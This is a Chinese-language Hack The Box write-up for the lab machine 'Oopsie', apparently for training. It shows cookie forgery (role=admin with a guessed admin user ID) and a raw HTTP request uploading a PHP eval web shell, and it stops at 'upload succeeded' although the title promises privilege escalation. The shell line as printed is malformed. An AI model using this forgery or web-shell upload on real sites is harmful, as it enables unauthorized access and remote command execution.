HTB靶场：Oopsie（SUID提权&PATH变量劫持）

Oopsie

1. 扫描

访问80服务，是一个类似于公司官网的网站

一个邮箱地址

2. 发现接口

有一个/cdn-cgi的路径，并且存在一个与login相关联的js文件

访问/cdn-cgi/login，首先尝试弱口令和注入

尝试失败后，使用guest进行登录，发现一个上传功能，需要使用admin权限

查看请求包数据，发现cookie中的参数较为简单，易伪造，尝试拦截改role=admin，发现不行

因此只能寻找对应的user名

3. 发现水平越权和垂直越权

继续寻找功能，发现除上传页面外，其他页面功能存在越权，admin的userID疑似为34322

第二次尝试伪造cookie

第二次尝试成功

4. 文件上传

根据网站提示，上传PHP马


POST /cdn-cgi/login/admin.php?content=uploads&action=upload HTTP/1.1
Host: 10.129.212.153
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------429036644026914667642740905968
Content-Length: 369
Origin: http://10.129.212.153
Connection: keep-alive
Referer: http://10.129.212.153/cdn-cgi/login/admin.php?content=uploads
Cookie: user=34322; role=admin
Upgrade-Insecure-Requests: 1

-----------------------------429036644026914667642740905968
Content-Disposition: form-data; name="name"

-----------------------------429036644026914667642740905968
Content-Disposition: form-data; name="fileToUpload"; filename="1.php"
Content-Type: application/x-php

<php eval($_GET['cmd']); >

-----------------------------429036644026914667642740905968--

上传成功